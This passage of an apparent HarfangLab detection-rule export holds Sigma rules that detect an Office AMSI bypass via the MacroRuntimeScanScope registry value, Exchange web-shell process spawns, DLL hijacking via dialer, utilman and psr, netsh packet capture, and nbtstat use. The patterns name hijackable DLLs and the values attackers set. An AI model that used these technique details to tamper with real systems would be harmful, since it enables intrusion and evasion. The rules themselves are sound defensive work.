"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_macroruntimescanscope_via_registry.yml",
"content": "title: Macro Runtime Scan Scope Disabled via Registry\nid: 91b2e839-ed45-45d4-8246-36a227383c19\ndescription: |\n Detects tampering with the MacroRuntimeScanScope registry value to disable runtime scanning of enabled macros.\n If the value is set to 0, the AMSI related DLLs will not be loaded in the Office process.\n It is recommended to check the process that set the registry value for suspicious activities.\nreferences:\n - https://github.com/outflanknl/Scripts/blob/master/AMSIbypasses.vba\n - https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/01/15\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.AMSIBypass\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\MacroRuntimeScanScope'\n Details: 'DWORD (0x00000000)'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91b2e839-ed45-45d4-8246-36a227383c19",
"rule_name": "Macro Runtime Scan Scope Disabled via Registry",
"rule_description": "Detects tampering with the MacroRuntimeScanScope registry value to disable runtime scanning of enabled macros.\nIf the value is set to 0, the AMSI-related DLLs are not loaded into the Office process, so macro content is never submitted to AMSI for scanning.\nIt is recommended to check the process that set the registry value for suspicious activities, especially if it is an Office application itself, as VBA-based AMSI bypasses modify this value from within the macro.\n",
"rule_creation_date": "2025-01-15",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91b39af5-d022-4539-8d2f-dab920377f0d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075611Z",
"creation_date": "2026-03-23T11:45:34.075614Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075618Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_webshell_exchange.yml",
"content": "title: Suspicious Process Spawned by Microsoft Exchange Web Server\nid: 91b39af5-d022-4539-8d2f-dab920377f0d\ndescription: |\n Detects a suspicious process being spawned by a Microsoft Exchange Web Server.\n Attackers may abuse vulnerabilities present in MS Exchange Web Applications to execute malicious code.\n Is is recommended to analyze this process' command-line to determine its legitimacy in the context of the web application.\nreferences:\n - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/02/18\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessParentCommandLine|contains: 'exchange'\n ProcessParentName: 'w3wp.exe'\n\n filter_w3wp:\n ProcessImage: '?:\\Windows\\System32\\inetsrv\\w3wp.exe'\n\n filter_wer:\n ProcessImage:\n - '?:\\Windows\\system32\\wermgr.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n\n filter_csc:\n ProcessImage: '?:\\Windows\\Microsoft.NET\\Framework64\\\\*\\csc.exe'\n\n filter_builtin_tools:\n - ProcessImage|endswith: '\\Bin\\OleConverter.exe'\n ProcessDescription: 'Microsoft Exchange Ole-To-Image converter'\n - ProcessImage|endswith: '\\Bin\\DocumentViewing\\TranscodingService.exe'\n ProcessDescription: 'TranscodingService exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91b39af5-d022-4539-8d2f-dab920377f0d",
"rule_name": "Suspicious Process Spawned by Microsoft Exchange Web Server",
"rule_description": "Detects a suspicious process being spawned by a Microsoft Exchange web server worker process (w3wp.exe running an Exchange application pool).\nAttackers may abuse vulnerabilities in Exchange web applications (e.g. ProxyShell) or a deployed web shell to execute malicious code.\nIt is recommended to analyze this process' command-line to determine its legitimacy in the context of the web application.\n",
"rule_creation_date": "2025-02-18",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91b43324-d77f-4b23-a3e1-57b8552ab213",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600577Z",
"creation_date": "2026-03-23T11:45:34.600580Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600588Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dialer.yml",
"content": "title: DLL Hijacking via dialer.exe\nid: 91b43324-d77f-4b23-a3e1-57b8552ab213\ndescription: |\n Detects potential Windows DLL Hijacking via dialer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dialer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\rtutils.dll'\n - '\\SspiCli.dll'\n - '\\TAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91b43324-d77f-4b23-a3e1-57b8552ab213",
"rule_name": "DLL Hijacking via dialer.exe",
"rule_description": "Detects potential Windows DLL hijacking via dialer.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by placing a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate, Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting a malicious DLL with an expected name in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91f15516-6033-4263-94a0-fc73b7b04d71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078731Z",
"creation_date": "2026-03-23T11:45:34.078733Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_utilman.yml",
"content": "title: DLL Hijacking via utilman.exe\nid: 91f15516-6033-4263-94a0-fc73b7b04d71\ndescription: |\n Detects potential Windows DLL Hijacking via utilman.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'utilman.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\duser.dll'\n - '\\OLEACC.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91f15516-6033-4263-94a0-fc73b7b04d71",
"rule_name": "DLL Hijacking via utilman.exe",
"rule_description": "Detects potential Windows DLL Hijacking via utilman.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by positioning a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate, Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule fires when a Microsoft-signed utilman.exe runs from outside System32, SysWOW64 or WinSxS and loads a dui70.dll, duser.dll or OLEACC.dll that is neither located in those directories nor signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "91f986ad-9625-4dc0-a9dc-55d37646ede1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295603Z",
"creation_date": "2026-03-23T11:45:35.295606Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295613Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://kb.acronis.com/content/65335",
"https://attack.mitre.org/techniques/T1040/",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1040_network_sniffing_netsh.yml",
"content": "title: Network Sniffed via netsh.exe\nid: 91f986ad-9625-4dc0-a9dc-55d37646ede1\ndescription: |\n Detects the use of built-in Windows packet capture netsh.exe to do network sniffing.\n Attackers may sniff network traffic to capture informations like the environment or authentication credentials.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://kb.acronis.com/content/65335\n - https://attack.mitre.org/techniques/T1040/\n - https://attack.mitre.org/software/S0108/\ndate: 2022/01/21\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - attack.s0108\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\netsh.exe'\n - OriginalFileName: 'netsh.exe'\n selection_command:\n # netsh trace start capture=yes tracefile=%temp%\\trace.etl maxsize=10\n CommandLine|contains|all:\n - 'trace'\n - 'start'\n - 'capture'\n\n exclusion_azure:\n ParentImage: '?:\\Packages\\Plugins\\Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentWindows\\\\*\\NetworkWatcherAgent\\NetworkWatcherAgent.exe'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/networking/data-collection-for-troubleshooting-802-1x-authentication-issues\n exclusion_troubleshooting:\n CommandLine: 'netsh trace start scenario=wlan,wlan_wpp,wlan_dbg,wireless_dbg globallevel=0xff capture=yes maxsize=1024 tracefile=?:\\MSLOG\\\\*_wireless_cli.etl'\n\n exclusion_paloalto:\n GrandparentImage:\n - '?:\\Program Files\\Palo Alto\\GlobalProtect\\PanGPS.exe'\n - '?:\\Program Files\\Palo Alto Networks\\GlobalProtect\\PanGPS.exe'\n\n # 
https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-troubleshooters/introduction-to-troubleshootingscript-toolset-tssv2\n exclusion_tssv2:\n CommandLine: '?:\\WINDOWS\\system32\\netsh.exe trace start capture=yes scenario=NDIS capturetype=physical traceFile=* correlation=no *maxSize=1 fileMode=circular overwrite=yes'\n ParentCommandLine: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n exclusion_perfview:\n ProcessGrandparentOriginalFileName: 'PerfView.exe'\n ProcessParentImage: '?:\\windows\\system32\\cmd.exe'\n\n # https://learn.microsoft.com/en-us/defender-endpoint/run-analyzer-windows\n exclusion_analyzer:\n ProcessCommandLine|endswith: 'netsh.exe wfp capture start file=*\\NetTraces\\WfpDiag.cab keywords=19'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "91f986ad-9625-4dc0-a9dc-55d37646ede1",
"rule_name": "Network Sniffed via netsh.exe",
"rule_description": "Detects the use of the built-in packet-capture capability of netsh.exe (netsh trace start capture=yes) to perform network sniffing.\nAttackers may sniff network traffic to capture information about the environment or authentication credentials.\nIt is recommended to investigate the parent process for suspicious activities and to review the resulting trace file (the path given by the tracefile= argument).\n",
"rule_creation_date": "2022-01-21",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9254d951-1bb8-4473-b6df-9eef56f82c34",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618684Z",
"creation_date": "2026-03-23T11:45:34.618686Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618690Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_psr.yml",
"content": "title: DLL Hijacking via psr.exe\nid: 9254d951-1bb8-4473-b6df-9eef56f82c34\ndescription: |\n Detects potential Windows DLL Hijacking via psr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'psr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AEPIC.dll'\n - '\\CLDAPI.dll'\n - '\\FLTLIB.DLL'\n - '\\HID.DLL'\n - '\\msdrm.dll'\n - '\\OLEACC.dll'\n - '\\SspiCli.dll'\n - '\\uireng.dll'\n - '\\version.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9254d951-1bb8-4473-b6df-9eef56f82c34",
"rule_name": "DLL Hijacking via psr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via psr.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by positioning a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate, Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule fires when a Microsoft-signed psr.exe runs from outside System32, SysWOW64 or WinSxS and loads one of the monitored DLLs (e.g. version.dll, HID.DLL) that is neither located in those directories nor signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92708e1b-412f-421c-999c-476dff6b969d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619744Z",
"creation_date": "2026-03-23T11:45:34.619746Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619750Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://strontic.github.io/xcyclopedia/library/nbtstat.exe-4320B5AED6DC77E8252C0D06A46FB90B.html",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_nbtstat.yml",
"content": "title: Nbtstat Execution\nid: 92708e1b-412f-421c-999c-476dff6b969d\ndescription: |\n Detects the execution of NBTStat.exe, a tool often used by attackers to display protocol statistics and current TCP/IP connections.\n Attackers may use it during discovery phase to gather informations about the host.\n It is recommended to investigate the parent process for any other suspicious activity.\nreferences:\n - https://strontic.github.io/xcyclopedia/library/nbtstat.exe-4320B5AED6DC77E8252C0D06A46FB90B.html\n - https://attack.mitre.org/techniques/T1016/\ndate: 2022/12/02\nmodified: 2026/02/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Nbtstat\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\nbtstat.exe'\n - OriginalFileName: 'nbtinfo.exe'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_gathernetwork:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c nbtstat -? 
>> config\\FileSharing.txt'\n GrandparentCommandLine: '?:\\windows\\system32\\cscript.exe ?:\\windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Program Files\\Sophos\\Sophos Diagnostic Utility\\sdugui.exe'\n - '?:\\Program Files\\Sophos\\Sophos Diagnostic Utility\\sducli.exe'\n - '?:\\Program Files (x86)\\Sophos\\Sophos Diagnostic Utility\\sdugui.exe'\n - '?:\\Program Files (x86)\\Sophos\\Sophos Diagnostic Utility\\sducli.exe'\n - '?:\\Program Files (x86)\\\\*\\bin\\xda.service.exe' # Xerox Device Agent\n - '?:\\Program Files (x86)\\ExpressVPN\\expressvpnd\\windows\\xvutil\\XvUtil.exe'\n - '?:\\Program Files (x86)\\Dipisoft\\WakeOnLan\\WakeOnLan.exe'\n - '?:\\program files (x86)\\xerox\\xerox centreware web\\bin\\xerox.cww.discovery.xrxdiscoveryservice.exe'\n - '*\\WakeOnLan397_portable\\WakeOnLan.exe'\n - '?:\\Program Files (x86)\\HEAT Software\\EMSS\\Web\\Services\\ScanEngine\\Engine\\engine.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\Goverlan Inc\\GoverlanAgent\\GovAgentx64.exe'\n - '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCD.exe'\n\n exclusion_grandparentimage:\n GrandparentImage: '?:\\Program Files (x86)\\Common Files\\Pulse Secure\\JUNS\\PulseSecureService.exe'\n\n exclusion_printwayy:\n ParentCommandLine: '?:\\Program Files (x86)\\Southwayy\\PrintWayy\\NetClientService\\Southwayy.PrintWayy.NetClientService.exe'\n\n exclusion_nessus:\n ParentCommandLine|startswith:\n - '?:\\Windows\\System32\\cmd.exe /c echo nbt_* > ?:\\Windows\\temp\\nessus_????????.txt '\n - '?:\\Windows\\System32\\cmd.exe /c echo nbt_* > ?:\\Windows\\TEMP\\nessus_????????.TMP '\n\n exclusion_axiell:\n ParentCommandLine: 'cmd /c nbtstat -n > InfoAxiell.txt'\n GrandparentCommandLine:\n - 'cache -c j -s ?:\\intersystems\\cache\\mgr'\n - 'irisdb -c j -s ?:\\intersystems\\cache\\mgr'\n\n exclusion_ccm:\n - ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessParentCommandLine|contains: 
'?:\\WINDOWS\\CCM\\SystemTemp\\\\????????-????-????-????-????????????.ps1'\n ProcessGrandparentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_servicenow:\n CommandLine|contains: ' > \\\\\\\\127.0.0.1\\c$\\temp\\\\*\\psscript_output_*.txt 2>&1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92708e1b-412f-421c-999c-476dff6b969d",
"rule_name": "Nbtstat Execution",
"rule_description": "Detects the execution of nbtstat.exe (PE original file name nbtinfo.exe), a built-in tool that displays NetBIOS over TCP/IP (NBT) protocol statistics, current TCP/IP connections and NetBIOS name tables.\nAttackers may use it during the discovery phase to gather information about the host.\nIt is recommended to investigate the parent process for any other suspicious activity.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2026-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92771aa1-9e3c-4fc1-b632-4f10e7ce241a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
